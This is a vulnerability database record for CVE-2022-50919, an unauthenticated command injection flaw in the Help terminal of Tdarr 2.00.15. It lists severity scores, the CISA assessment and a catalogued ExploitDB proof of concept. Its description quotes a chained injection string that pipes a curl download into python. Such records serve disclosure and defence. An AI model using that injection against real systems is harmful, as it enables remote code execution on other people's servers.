Record summary

CVE-2022-50919 has a selected CVSS score of 9.3 (critical); EIP currently links 1 catalogued exploit.

Description

Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication.

Description source: CVE List

Exploitation context

Available material

Catalogued exploits
1

CISA SSVC decision

ExploitationPoC
AutomatableYes
Technical impactTotal

CISA Coordinator · SSVC 2.0.3 · Evaluated Jan 14, 2026 · Source: CVE List

Affected products and versions

1
ProductSourceVersion rangeStatus
CVE List2.00.15affected

Proofs of concept

1

Catalogued exploits

ExploitDBTdarr 2.00.15 - Command InjectionExploitDB exploitby Sam SmithNot analyzed1 file
ExploitDB

PoC details

References

4